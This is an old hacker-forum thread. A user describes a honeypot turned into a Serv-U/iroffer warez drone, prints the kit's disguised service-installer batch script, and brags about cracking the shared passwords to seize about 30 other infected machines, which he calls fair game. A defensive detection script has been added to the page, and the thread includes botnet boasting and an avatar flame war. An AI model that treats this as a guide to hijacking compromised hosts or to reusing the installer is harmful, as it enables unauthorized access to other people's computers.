tibbar
My honeypot got "r00ted" yesterday, and turned into a serv-u / iroffer drone.

The install kit used was quite interesting, it made a folder WINNT (my windows folder is \WINDOWS) on root, which was hidden from windows (had to dameware to it), and inside this was the following structure: C:\WINNT\microsoftdrivers\etc\.

This contained the usual stuff like firedaemon, serv-u, iroffer and some scripts to secure the box.

Anyway, interestingly, it did not make a my.config file for iroffer, so to trace it, i just used a packet sniffer.

I found the xdcc channel, which had another 30 or so bots inside.

I then started brute forcing the servudaemon.ini hashes (it set up a full execute priv account on root c).

Now for the funny bit. After resolving all the xdcc bots' ip addresses, it turns out they all use the same autoroot install kit, and hence the same serv-u pwds.

Needless to say, overnight the room lost all its bots (i wont say where they live now).

The moral of this story: secure your pubstros properly, and dont use identical pwds on all (and avoid execute priv in servu).
saetji
y didn't u just set up a sniffer on ur comp and wait for the person to logon? You could've gotten the pass that much easier
TheAngel
QUOTE (saetji @ Feb 18 2004, 12:46 PM)
y didn't u just set up a sniffer on ur comp and wait for the person to logon? You could've gotten the pass that much easier

damn man, a hitler avatar?
man thats too much
hitler is a sick guy
and also the ppl who think that he did good things to germany
(filtered) Hitler!
Thom
Ah man(theangel) dont take it that serious, a hitler avatar does not mean he is a nazi or whatsoever
BOMBARDiER
TheAngel is right..
Gotisch
isn't the avatar half hitler half bush ?
cram
Lol, sure. So can you explain to us how you brute-forced those MD5 Serv-U hashes sooo fast? And how did you know Serv-U's MD5 salt format?
Gotisch
Maybe it was serv-u 2.5
dr0zaxx
HAHA! Stealing XDCC Bots from people! You thief! I better keep a lookout for you in future!
EXPLOiTED
What packet sniffer did u use to set up on their comp...
Double-=V=-
QUOTE (Thom @ Feb 18 2004, 01:31 PM)
Ah man(theangel) dont take it that serious, a hitler avatar does not mean he is a nazi or whatsoever

A hitler avatar means you're a nazi. Seriously there is no other conclusion, a normal person wouldn't joke about such things.
FiNaLBeTa
QUOTE (Double-=V=- @ Feb 18 2004, 05:24 PM)
QUOTE (Thom @ Feb 18 2004, 01:31 PM)
Ah man(theangel) dont take it that serious, a hitler avatar does not mean he is a nazi or whatsoever

A hitler avatar means you're a nazi. Seriously there is no other conclusion, a normal person wouldn't joke about such things.

Welcome to the internet.

free speech, remember. No matter what it is, so stfu
int23h
please note that it is half hitler half bush so don't worry
jockel
QUOTE (dr0zaxx @ Feb 18 2004, 03:41 PM)
HAHA! Stealing XDCC Bots from people! You thief! I better keep a lookout for you in future!

thief ??

i don't think he is the thief ..
the h4x0r was the thief who stole traffic from other people by installing irc bots on their boxes ...

and by the way, I as a German am pissed off by nazis too,
but i think this avatar isn't meant to glorify nazis..
i think it's meant in a way like .. compare hitler with bush ...
hey bush didn't kill millions of jews ..
but they both started war ....
think about it ..
but to get back to topic .. =)
nice trick =)
phaeton
Wtf!? A hitler avatar means you are a nazi? Way to be narrow-minded. Maybe he dislikes the Bush government and is trying to show his dislike. Maybe he's trying to be funny (I had a chuckle at it). Lighten the (filtered) up people.

Btw, to get the MD5 hash format just search this forum, it's been discussed (2 letters then MD5 hash).
JDog45
QUOTE (tibbar @ Feb 18 2004, 12:37 PM)
My honeypot got "r00ted" yesterday, and turned into a serv-u / iroffer drone.

The install kit used was quite interesting, it made a folder WINNT (my windows folder is \WINDOWS) on root, which was hidden from windows (had to dameware to it), and inside this was the following structure: C:\WINNT\microsoftdrivers\etc\.

This contained the usual stuff like firedaemon, serv-u, iroffer and some scripts to secure the box.

Anyway, interestingly, it did not make a my.config file for iroffer, so to trace it, i just used a packet sniffer.

I found the xdcc channel, which had another 30 or so bots inside.

I then started brute forcing the servudaemon.ini hashes (it set up a full execute priv account on root c).

Now for the funny bit. After resolving all the xdcc bot's ip addresses, it turns out they all use same autoroot install kit, and hence the same serv-u pwds.

Needless to say, overnight the room lost all its bots (i wont say where they live now).

The moral of this story, secure your pubstros properly, and dont use identical pwds on all (and avoid execute priv in servu).

I recently had to reformat my PC and when browsing IRC I came across adsbegone or something similar to it. It was about 4.7MB. I downloaded it and ran it. Nothing happened. That's when the flag went up.

Sure enough it was a root kit and made the same directory you were talking about with the same items.
Warlord_David
QUOTE (tibbar @ Feb 18 2004, 12:37 PM)
My honeypot got "r00ted" yesterday, and turned into a serv-u / iroffer drone.

The install kit used was quite interesting, it made a folder WINNT (my windows folder is \WINDOWS) on root, which was hidden from windows (had to dameware to it), and inside this was the following structure:  C:\WINNT\microsoftdrivers\etc\.

This contained the usual stuff like firedaemon, serv-u, iroffer and some scripts to secure the box.

Anyway, interestingly, it did not make a my.config file for iroffer, so to trace it, i just used a packet sniffer.

I found the xdcc channel, which had another 30 or so bots inside.

I then started brute forcing the servudaemon.ini hashes (it set up a full execute priv account on root c).

Now for the funny bit.  After resolving all the xdcc bot's ip addresses, it turns out they all use same autoroot install kit, and hence the same serv-u pwds.

Needless to say, overnight the room lost all its bots (i wont say where they live now).

The moral of this story, secure your pubstros properly, and dont use identical pwds on all (and avoid execute priv in servu).

HAHAHHA i actually know where that came from. It's from a so called "pop-up killer" called Abdolish. The asses set up firedaemon, iroffer, and serv-u services.

err, didnt see jdog's post
tibbar
heh, if im evil, what does that make the guy who fell for my honeypot (apart from stupid).

anyway, in case anyone here has been "rooted" (it annoys me this kiddie term being used for non rootkits), here's the install script and hence the services to kill:

@echo off
REM Silently merge the kit's registry file.
regedit /s fire.reg

REM Both variables point at the hidden drop directory mentioned above.
SET MXHOME=c:\winnt\microsoftdrivers\etc\
SET MXBIN=c:\winnt\microsoftdrivers\etc\

REM Register four Windows services from FireDaemon XML definitions
REM (ftp = serv-u, irof = iroffer, secure = the "secure the box" script, rserv).
FireDaemon -i ftp.xml
FireDaemon -i irof.xml
FireDaemon -i secure.xml
FireDaemon -i rserv.xml

REM The services were given innocuous-looking names; these are what you stop.
net start indexing
net start wlogin
net start DNS
net start network

REM Remove the dropper and its helpers from C:\TEMP.
del c:\TEMP\install.bat
del c:\TEMP\help.exe
del c:\TEMP\hideapp.exe

@EXIT


i.e. simply stop indexing, wlogin, DNS and network to stop the pubstro installation.

(isn't it nice of the kiddies to leave me an uninstall guide).

The only bit of the 'kit' which surprised me was that the iroffer config had been patched into the .exe - i.e. no my.config file.

Anyways, my view is that there's nothing wrong with "stealing" other ppls bots, if they are too stupid to secure them.
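Reading the install script from the defender's side, the useful indicators it leaks are the four service names it starts and the hidden directory everything runs from. The following triage helper is an added example for this page, not code from tibbar's post or from the kit: it parses the text output of the Windows Service Control Manager CLI (`sc query` and `sc qc <name>`) and flags services that either carry one of those names or whose binary path points into `C:\WINNT\microsoftdrivers\etc\` or through FireDaemon. The sample `sc` output is constructed, and the FireDaemon command line shown in it is an assumption about how the XML-defined services resolve. One point worth noting: the post says the directory was hidden from Windows itself, so a file-system sweep can miss it, but the SCM still records the binary path of every registered service, which is why the path check is the high-confidence signal and a bare name match (a real DNS Server or Indexing Service uses such names too) is only a low-confidence one.

```python
"""Triage helper for the serv-u / iroffer drone kit described in this thread.

Added example for this page; not code from the forum post or the kit.
"""
import re
import subprocess
import sys

# Indicators taken from the install.bat in the post above.
KIT_DIR = r"c:\winnt\microsoftdrivers\etc"
KIT_SERVICE_NAMES = {"indexing", "wlogin", "dns", "network"}


def parse_sc_query(text):
    """Service names from `sc query type= service state= all` output."""
    return re.findall(r"^SERVICE_NAME:\s*(\S+)", text, re.MULTILINE)


def parse_binary_path(qc_text):
    """BINARY_PATH_NAME from `sc qc <name>` output, or '' if absent."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", qc_text)
    return m.group(1).strip() if m else ""


def classify(name, binary_path):
    """Return (level, reasons) for one service.

    'high' - binary path points into the kit (the SCM keeps the path even
             though the folder itself was hidden from Explorer on the box).
    'low'  - only the service name matches; legitimate DNS Server or
             Indexing Service names collide, so verify by hand.
    None   - nothing matched.
    """
    reasons, path_hit = [], False
    bp = binary_path.lower()
    if KIT_DIR in bp:
        reasons.append("binary lives under the kit's hidden directory")
        path_hit = True
    if "firedaemon" in bp:
        reasons.append("service is wrapped by FireDaemon")
        path_hit = True
    if name.lower() in KIT_SERVICE_NAMES:
        reasons.append("service name is one started by the kit's install.bat")
    if not reasons:
        return None, []
    return ("high" if path_hit else "low"), reasons


def triage(query_text, qc_texts):
    """qc_texts maps service name -> its `sc qc` output.
    Returns only flagged services as name -> (level, reasons)."""
    flagged = {}
    for name in parse_sc_query(query_text):
        level, reasons = classify(name, parse_binary_path(qc_texts.get(name, "")))
        if level is not None:
            flagged[name] = (level, reasons)
    return flagged


def live_triage():
    """Run the real sc.exe commands on a Windows host."""
    def run(*args):
        return subprocess.run(["sc", *args], capture_output=True,
                              text=True, check=False).stdout
    query = run("query", "type=", "service", "state=", "all")
    return triage(query, {n: run("qc", n) for n in parse_sc_query(query)})


# Constructed sample output, not captured from a real host. The FireDaemon
# command line is an assumption about how the kit's XML services resolve.
SC_QUERY_SAMPLE = """
SERVICE_NAME: wlogin
DISPLAY_NAME: Windows Logon Helper
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING

SERVICE_NAME: DNS
DISPLAY_NAME: DNS Server
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING

SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 4  RUNNING
"""

SC_QC_SAMPLES = {
    "wlogin": r"""SERVICE_NAME: wlogin
        BINARY_PATH_NAME   : C:\WINNT\microsoftdrivers\etc\FireDaemon.exe irof.xml
        DISPLAY_NAME       : Windows Logon Helper
""",
    "DNS": r"""SERVICE_NAME: DNS
        BINARY_PATH_NAME   : C:\WINDOWS\System32\dns.exe
        DISPLAY_NAME       : DNS Server
""",
    "Spooler": r"""SERVICE_NAME: Spooler
        BINARY_PATH_NAME   : C:\WINDOWS\system32\spoolsv.exe
        DISPLAY_NAME       : Print Spooler
""",
}

if __name__ == "__main__":
    results = (live_triage() if sys.platform == "win32"
               else triage(SC_QUERY_SAMPLE, SC_QC_SAMPLES))
    for svc, (level, why) in results.items():
        print(f"{svc}: {level} - {'; '.join(why)}")
```

On the sample data this flags `wlogin` as high (FireDaemon binary under the kit directory) and `DNS` as low (name only, real dns.exe path), and leaves `Spooler` alone; on a Windows host it runs the real `sc` commands instead.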
Zekk
: 0 thats cool
Player
how would someone make their xdcc channel bot secure? i'm just curious
tibbar
well, had they not given execute rights to serv-u, i wouldnt have been able to steal them.
saetji
yes u could - if the account was system admin, u couldve connected to the bots ftp via serv-u software and changed ur priv to +exec
saetji
btw - this is hitler 2! not hitler - its george MONKEY bush dressed up as hitler and demanding oil! i am not a nazi and have no contacts with germany
arun0075
lol saetji dude are u the same from apna. are u the one who is king of apna
if u are then i have heard a lot abt u hmmm.. nothing bad all good that u are a good programmer and stuffs u got it naa hehe
MattMannLT
QUOTE (tibbar @ Feb 18 2004, 11:33 PM)

The only bit of the 'kit' which surprised me, was the iroffer config has been patched to the .exe - i.e. no my.config file.

not so true, he didn't patch anything. All he did was change the file extension: as long as the config file is written in Notepad (i dont know the exact term for the language but you get the point) you can change the file extension to anything you want and iroffer will still be able to read it.

you should open every file under about 100K up in notepad; one of them will be the config file
D0cSyS
i am sorry saetji but if you are an american and proud of your country please get rid of that lame avatar, no matter if it's 2 fag halves. I am proud of my country the UNITED STATES OF AMERICA and you offend me by just having that icon.

You have the freedom i can't stop you but if you feel like rocking that avatar go to germany or some other country.


back on topic. That's nice you took his/her bots away now what are you going to do with them install ur own pack?

The rooter was using a very simple pack. When i was doing all of that stuff, the only way u would be able to get any info on what was going on would be to use a sniffer like you did, but it would have been hard for you to find all the directories, get past the 10 dummy serv-u's, anal ftps, raidens, and get past the ssl password-protected irc server which binds to a real server once authenticated.

ahhh the fun i had.

I just feel bad i lost a 5000 botnet due to a dumb ass move in the dns assignments.
so nobody is perfect. this guy made the mistake of using a very simple rootpack.

btw: what exploit did he gain access through
Black Flag
damn lol... just because you're american doesn't mean you have to be proud - or move to germany. keep your closed-minded comments to yourself and let him express his hate for bush, as do i. he can't even eat a pretzel that damn retard *laughs*

back to topic:

what did you set up your honeypot as? or did you just leave your computer in the open.
tonikgin
serv-u uses MD5 encryption for its passwords stored in the ini file; it would have taken you somewhere around a few hundred thousand years to brute force it using a typical pc. you didnt get the serv-u password, maybe the iroffer password, which only used DES encryption and can be cracked using very old school programs.
tibbar
lmao, someone here doesnt know about dictionary attacks on hashes, and had i been less lucky, and met a strong password, I would have simply downloaded a set of rainbow tables and still have found the password in under a few hours.

The honey pot setup was VMWare, running XP without SP1 and using default admin password.

oh and can we PLEASE get back on the topic of security and stop this stupid flame war.

I find this remark implicitly racist: "feel like rocking that avatar go to germany". He would not be welcome in Germany either; this comment implies nazis are currently supported in Germany, which is total F*CK*NG S*IT ok.
DiJiTooL
good job tibbar, very funny
tonikgin
99% of the people on this website are complete morons, this place is a haven for bored kids that dont know shit about security, and looking for a ./ or .exe to do the work for them.
tibbar
that's a pretty harsh comment.

a lot of newbies have joined since the forum opened again, but there are many extremely experienced security experts here.

if you dont like it, go else where.
syiron
anybody can give me that honeypot? i want to try to steal xdcc bots.
phaeton
hmmm he said what he wrote. do you read the entire thread before posting? also, search on google (if it is within your knowledge how to) on honeypots.
Thom
syiron he just wrote on page 2 that he was using VMWare, on xp without sp1.... www.google.com.
Invision Power Board © 2001-2005 Invision Power Services, Inc.